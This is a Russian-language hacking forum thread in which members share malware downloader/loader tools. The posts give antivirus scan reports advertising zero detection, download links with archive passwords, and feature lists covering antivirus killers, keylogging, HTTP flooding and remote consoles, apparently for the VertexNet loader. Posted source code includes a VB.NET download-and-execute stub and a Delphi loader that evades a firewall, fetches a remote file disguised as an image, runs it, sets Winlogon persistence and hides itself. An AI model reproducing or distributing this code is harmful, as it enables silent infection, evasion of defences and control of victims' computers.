Посоветуйте лоадер.

[DarckSol]

Simple Downloader

Report date: 2010-07-13 21:45:22 (GMT 1)
File name: test_server.exe
File size: 7680 bytes
MD5 hash: 5e95b1b76282eb8cb304bb7747a2e62c
SHA1 hash: 6c33b7d95c4746edc0aa8bc7ae56c9dd86af54be
Detection rate: 0 on 16 (0%)
Status: CLEAN
Antivirus Database Engine Result
a-squared 10/07/2010 5.0.0.7
Avast 100710-2 5.0
AVG 271.1.1/2995 9.0.0.725
Avira AntiVir 7.10.9.56 7.6.0.59
BitDefender 11/07/2010 7.0.0.2555
ClamAV 11/07/2010 0.96.1
Comodo 4.1.920
Dr.Web 11/07/2010 5.0
F-PROT6 20100710 4.5.1.85
G-Data 21.488 2.0.7309.847
Ikarus T3 11/07/2010 1.1.84.0
Kaspersky 11/07/2010 9.0.0.736
NOD32 5269 4.0.474
Panda 10/07/2010 10.0.3.0
TrendMicro 299 9.120-1004
VBA32 11/07/2010 3.12.12.2

Спойлер: 1

Download
passwd: xss.pro/

Я тут падумал, и решил что буду время от вресени выкладывать тут какой то софт, по мере своей возможности дабы не создавать новую тему про лоадеры, Ar3s если ты конечно не против...))

 

[Ar3s]

нормально. Выкладывай.

 

[DarckSol]

Cypher's downloader

Report date: 2010-07-21 11:23:27 (GMT 1)
File name: exe.exe
File size: 4608 bytes
MD5 hash: 315bd3f5a720ce2110423ee92e68adc6
SHA1 hash: 1afcfe7953ae2ba21a6b136184796b0150bc2793
Detection rate: 0 on 16 (0%)
Status: CLEAN
Antivirus Database Engine Result
a-squared 2010-07-21 5.0.0.7
Avast 2010-07-21-1 5.0
AVG 271.1.1/2988 9.0.0.725
Avira AntiVir 7.10.9.33 7.6.0.59
BitDefender 2010-07-21 7.0.0.2555
ClamAV 2010-07-21 0.96.1
Comodo 4.1.920
Dr.Web 2010-07-21 5.0
F-PROT6 2010-07-21 4.5.1.85
G-Data 21.481 2.0.7309.847
Ikarus T3 2010-07-21 1.1.84.0
Kaspersky 2010-07-21 9.0.0.736
NOD32 5263 4.0.474
Panda 2010-07-21 10.0.3.0
TrendMicro 293 9.120-1004
VBA32 2010-07-21 3.12.12.2

Спойлер: 1

Download
passwd: xss.pro/

 

[2FED]

Админка к нему есть,или это совсем уж простенький

 

[Pernat1y]

Админка к нему есть,или это совсем уж простенький

он не управляемый. тоесть загрузка только с 1 линка

 

[DarckSol]

iDownLoad

AvKiller(Kills Anti Viruses)
-Avast
-Kaspersky
-Bitdefender
-Norton
-McAfee
-And other Anti Spywares

Misc's
-Disable TaskManager
-Disable Run
-Disable RegEdit
-Disable Command Prompt
-System Restore
-Icon Changer

File information
Report date: 2010-07-21 23:44:54 (GMT 1)
File name: stub.exe
File size: 25088 bytes
MD5 hash: 2328719a0f5cf1ad2f0f0c70b057edd8
SHA1 hash: bd98c759e9c6f1b9516bdbc7e678ee24e2414421
Detection rate: 3 on 16 (19%)
Status: INFECTED
Antivirus Database Engine Result
a-squared 18/07/2010 5.0.0.13 Trojan-Dropper.MSIL!IK
Avast 100718-0 5.0
AVG 271.1.1/3013 9.0.0.725
Avira AntiVir 7.10.9.108 7.6.0.59 TR/Dropper.Gen
BitDefender 19/07/2010 7.0.0.2555
ClamAV 18/07/2010 0.96.1
Comodo 5456 4.1.920
Dr.Web 19/07/2010 5.0
F-PROT6 20100718 4.5.1.85
G-Data 21.541 2.0.7309.847
Ikarus T3 18/07/2010 1.1.84.0 Trojan-Dropper.MSIL
Kaspersky 19/07/2010 9.0.0.736
NOD32 5290 4.0.474
Panda 18/07/2010 10.0.3.0
Solo 19/07/2010 9.0-2010
TrendMicro 317 9.120-1004
VBA32 19/07/2010 3.12.12.2

Спойлер: 1

download
passwd:xss.pro/

 

[TrueUser]

DarckSol Такое ощущение что ты сам их и клепаешь :lol2:
Один за другим...

 

[DarckSol]

Такое ощущение что ты сам их и клепаешь lol.gif
Один за другим...

нет, я их не клипаю ... я их нахожу и делюсь с народом тут...

 

[DarckSol]

Downloader And Executer V1.0

File information
Report date: 2010-07-26 17:15:26 (GMT 1)
File name: Stub.exe
File size: 11264 bytes
MD5 hash: 5edd8d73badaba1ab6420deb03450cd7
SHA1 hash: 4df2dfe3015b0d11a32011ec13458bedec72f566
Detection rate: 0 on 16 (0%)
Status: CLEAN
Antivirus Database Engine Result
a-squared 25/07/2010 5.0.0.13
Avast 100725-0 5.0
AVG 271.1.1/3027 9.0.0.725
Avira AntiVir 7.10.9.193 7.6.0.59
BitDefender 26/07/2010 7.0.0.2555
ClamAV 25/07/2010 0.96.1
Comodo 5456 4.1.920
Dr.Web 26/07/2010 5.0
F-PROT6 20100725 4.5.1.85
G-Data 21.566 2.0.7309.847
Ikarus T3 25/07/2010 1.1.84.0
Kaspersky 26/07/2010 9.0.0.736
NOD32 5314 4.0.474
Panda 25/07/2010 10.0.3.0
TrendMicro 335 9.120-1004
VBA32 26/07/2010 3.12.12.2
Extra information
File type: Executable File (EXE)
Packer: Nothing found
Binder detector: Nothing found
PDF analyzer: Nothing found

Спойлер: 1

DownLoad
passwd: xss.pro/

 

[el-]

[mod]el-: не ставьте хайд в один пост, если стафф дешевый не ставьте хайд вообще, если же имеет ценность то ставьте хайд от сотни, избавьте модераторов от зачисток "постов благодарности" и тех кто набивает посты[/mod]

 

[DarckSol]

W0rmy Downloader V1

Антивирус Файл Результат
NOD32 -
IKARUS -
VirusBuster -
DrWeb -
Avast -
McAfee -
BitDefender -
Sophos -
eTrust -
AVG8 -
ClamWin -
KAV8 -
SAV -
Vba32 -
F-Prot -
A-Squared -
TrendMicro -
F-Secure -
OneCare -
Avira -
Ewido -
Panda -
Vexira -
Norman -
Solo -
ArcaVir -
Webroot -
TrendMicro2010 virus
Comodo Scan Error. AV has probably crashed
Rising -
QuickHeal -
DigitalPatrol Scan Error. AV has probably crashed
GData -
AVL Scan Error. AV has probably crashed
IkarusT3 -
Total infected: 1/35
http://virtest.com/log.php?dir=155283&id=8...8770f474e231ea0

Скачать|Download

passwd:dzBybXkgRG93bmxvYWRlci5yYXI

 

[free-football]

больше половины уже не фурычат((((

 

[DarckSol]

uDownload

File Info

Report date: 2010-10-18 07:45:02 (GMT 1)
File name: userver-exe
File size: 6656 bytes
MD5 Hash: f67828fefd483b5e9f5c2a1030e1bca5
SHA1 Hash: 5a9b6ab55c3bc11f09ef86e963dfea646d927736
Detection rate: 0 on 16 (0%)
Status: CLEAN

Detections

a-squared -
Avast -
AVG -
Avira AntiVir -
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster -

Скачать|Download
passwd:+xss.pro/+

 

[accelerator]

W0rmy Downloader V1

Толку от этого лоадера не больше чем от того, что дотнет требует.

Imports Microsoft.VisualBasic, System, System.IO
Module Module1
Dim TPath As String = System.IO.Path.GetTempPath
Sub Main()
            Try 
                My.Computer.Network.DownloadFile("downloadlink", (TPath + "/filename.exe"))
                Shell((TPath + "\filename.exe"))
            Catch ex As Exception
                End
            End Try
        End Sub
End Module

passwd:dzBybXkgRG93bmxvYWRlci5yYXI

Архив был без пароля

 

[DarckSol]

Цитата|Quote(DarckSol @ 30.08.10, 14:27:00)
W0rmy Downloader V1
*

Толку от этого лоадера не больше чем от того, что дотнет требует.

Код|Code
Imports Microsoft.VisualBasic, System, System.IO
Module Module1
Dim TPath As String = System.IO.Path.GetTempPath
Sub Main()
           Try
               My.Computer.Network.DownloadFile("downloadlink", (TPath + "/filename.exe"))
               Shell((TPath + "\filename.exe"))
           Catch ex As Exception
               End
           End Try
       End Sub
End Module


Цитата|Quote(DarckSol @ 30.08.10, 14:27:00)
passwd:dzBybXkgRG93bmxvYWRlci5yYXI
*

Архив был без пароля

program loader;
uses
sysutils,
shellapi,
urlmon,
windows, messages;

const

rfile='http://cs762.vkontakte.ru/u1670119/c_6627ae42.jpg'; //Удалённый файл кторый мы будем качать...
lfile='C:\swchost.jpg'; //Куда будем сохранять скаченный файл...


function RunFile(FileName, Params:String):Integer; //Функция для запука файла, на обычную функцию запуска клааса ShellExecute ругается антивирус поэтому мы её пишем сами...
begin
Result := ShellExecute(0,nil,pchar(filename),pchar(params),pchar(extractfilepath(filename)),sw_normal);
end;
procedure SetRegValue(ROOT: hKey; Path, Value, Str: String); //Функция для работы с реестром
var
Key :hKey;
Size :Cardinal;
begin
RegOpenKey(ROOT, pChar(Path), Key);
Size := 2048;
RegSetValueEx(Key, pChar(Value), 0, REG_SZ, @Str[1], Size);
RegCloseKey(Key);
end;
function nud_emulator(FileName: string): DWORD; //Эмуляция
var
F: file of DWORD;
P: Pointer;
Fsize: DWORD;
Buffer: array [0..500] of DWORD;
begin
FileMode := 0;
AssignFile(F, FileName);
if Fsize > 500 then Fsize := 500;
P := @Buffer;
asm
xor eax, eax
xor ecx, ecx
mov edi , p
@again:
add eax, [edi + 4*ecx]
inc ecx
cmp ecx, fsize
jl @again
mov @result, eax
end;
end;
function HexToStr(hex: string): string;
var
i: Integer;
begin
hex:= StringReplace(hex, ' ', '', [rfReplaceAll]);
for i:= 1 to Length(hex) div 2 do
Result:= Result + Char(StrToInt('$' + Copy(hex, (i-1) * 2 + 1, 2)));
end;
function encodestr(instr: string): string;
var
i, j: integer;
begin
result := '';
j := 137;
for i := 1 to length(instr) do
begin
result := result + chr(ord(instr) xor j);
if j = 255 then j := 1 else inc(j);
end;
end;
function nud_SPOILER(const FileName: string; Attr: Integer): Integer; //Функция предаёт атрибуты нашему лоадеру, при использовании мы его прячем...
begin
Result := 0;
if not SetFileAttributes(PChar(FileName), Attr) then
Result := GetLastError;
end;
procedure fire; //Обходы фаеровла Kaspersky Anti-Hacker до версии 6...
var
prot: array [1..15] of THandle;
u:integer;
begin
prot[14] := FindWindow(nil, 'Kaspersky Anti-Hacker');
prot[15] := FindWindowEx(prot[14], 0, 0, 'Меню');
prot[1] := GetWindow(prot[15],gw_Child);
for u := 2 to 13 do
prot := GetWindow(prot[u-1],gw_HWNDNext);
PostMessage(prot[2],wm_KeyDown,vk_MENU,0);
PostMessage(prot[2],wm_KeyDown,vk_RETURN,0);
postMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_Down,0);
PostMessage(prot[2],wm_KeyDown,vk_RETURN,0);
sleep(15000);
end;
var
st:string;
begin
sleep(1000*60*30); // После запуска спим 30 минут, поскольку в этом варианте лоадера цыкл всей программы повтаряется только 1 раз, нам надо выждать что бы жертва подключилась к интернету.
fire;
nud_emulator(st + encodestr('¦пуьббэхгјцмр'));
urlmon.URLDownloadToFileW(nil,HexToStr(rfile),lfile,0,nil);
RunFile(lfile,'');
SetRegValue(HKEY_LOCAL_MACHINE,'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Explorer.exe',lfile);
nud_SPOILER(paramstr(0),3);
end.

Это моя какая то древня наработка хз скок лет назат..
такую ерунду я тоже могу за 2 минут настрочить....

Да не спорю что оно почти всё бесполезно, но тут паблик раздача, так что если не нравится что то пиши, но толку не будет.

Добавлено в [time]1288772555[/time]
nEOF Downloader By LuisN2

File Info

Report date: 2010-11-02 15:37:11 (GMT 1)
File name: down-exe
File size: 16384 bytes
MD5 Hash: 1e0ee36d5b983f410f39059db090da00
SHA1 Hash: 533f5a66faa127134a6c6ed44e03f6a2de49f7bb
Detection rate: 1 on 16 (6%)
Status: INFECTED

Detections

a-squared - [/color]
Avast -
AVG -
Avira AntiVir - TR/VB.Downloader.Gen
BitDefender -
ClamAV -
Comodo -
Dr.Web -
F-PROT6 -
Ikarus T3 -
Kaspersky -
NOD32 -
Panda -
TrendMicro -
VBA32 -
VirusBuster - [/color]

Скачать|Download

 

[accelerator]

А что это за nud_emulator? )

 

[DarckSol]

accelerator,08.11.10, 11:29:05]
nud_emulator

Игры с первыми 512 байтами... в общем полумусор...
--**--

Features:

* Small Server Size
* FUD
* No EOF Detection
* Able To Change Downloaded File's Save Name
* Test Download Button
* More to come!

RESULTS: 1/33
AVG Free OK
Ahn OK
ArcaVir OK
Avast 5 OK
Avast OK
AntiVir (Avira) OK
BitDefender OK
VirusBuster Internet Security OK
Clam Antivirus OK
COMODO Internet Security OK
Dr.Web OK
eTrust-Vet OK
F-PROT Antivirus OK
F-Secure Internet Security OK
G Data OK
IKARUS Security OK
Kaspersky Antivirus OK
McAfee OK
MS Security Essentials OK
ESET NOD32 OK
Norman OK
Norton Antivirus OK
Panda Security OK
A-Squared OK
Quick Heal Antivirus OK
Rising Antivirus OK
Solo Antivirus OK
Sophos OK
Trend Micro Internet Security OK
VBA32 Antivirus OK
Vexira Antivirus OK
Webroot Internet Security OK
Zoner AntiVirus INFECTED [Trojan.iant of MSIL/Injector.AT]

http://scan4you.net/result.php?id=af615_551gj

Скачать|Download

 

[DarckSol]

VertexNet loader

VertexNet это лоадер от создателя бэкдоров SynRatrat и DarkComet RAT - DarkCoderSc.
Лоадер резидентный, имеет веб-админку. Написан полностью с нуля.

Билдер.

В билдере можно выбрать мьютекс процесса, путь для дропа, имя файла, путь до админки, порт для доступа к админке. Есть возможность билда не резидентных ботов, то есть троянец не будет инсталлироваться в системе.
Бот написан на c++ в Code::Blocks с использованием mingw.

Фукционал лоадера:
- Скачивание и запуск файла
- Кейлоггер
- Скачивание любого файла из зараженной системы
- Http-флуд
- Удаленная консоль
- Посещение указанной веб страницы
- Получение списка процессов бота
- Получение списка модулей из PID (process id)
- Деинсталляция и закрытие процесса лоадера в системе

В будущем планируется постоянное совершенствование всего пакета (админки, билдера, бота), а так же добавление функционала: обход фаеров и проактивок, поддержка плагинов.
Формграббер автор делать не будет и подобные плагины вряд ли будет выкладыват ьв паблик или на продажу.

Админка написана на пыхе. Для работы необходима бд mysql. Поддерживаются все популярные браузеры. Инструкция по установке+линк на видеомануал по установке в архиве.

Скрины админки:

http://unremote.org/wp-content/uploads/2011/03/screen2log.png

http://unremote.org/wp-content/uploads/2011/03/screenb1.png

http://unremote.org/wp-content/uploads/2011/03/screenup.png

http://unremote.org/wp-content/uploads/201.../screenuser.png

Подробней можно прочитать на сайте: http://unremote.org/?p=343
Скачать: http://www.mediafire.com/?1txspm085mu4ov5

**А вот и более свежая версия - v.1.1.1

Скачать|Download

Источник: http://exploit.in/forum/index.php?showtopic=46815

 

[anty]

VertexNet loader

Кто пользовался, есть отзывы по даному лоадеру? Я так понимаю фаирволы палят его работу?

 

[DarckSol]

Цитата|Quote(DarckSol @ 27.04.11, 10:42:48)
VertexNet loader
*


Кто пользовался, есть отзывы по даному лоадеру? Я так понимаю фаирволы палят его работу?

тут паблик раздача софта, никто ничего не тестил, погоняй сам и скажи обходы работают или уже нет)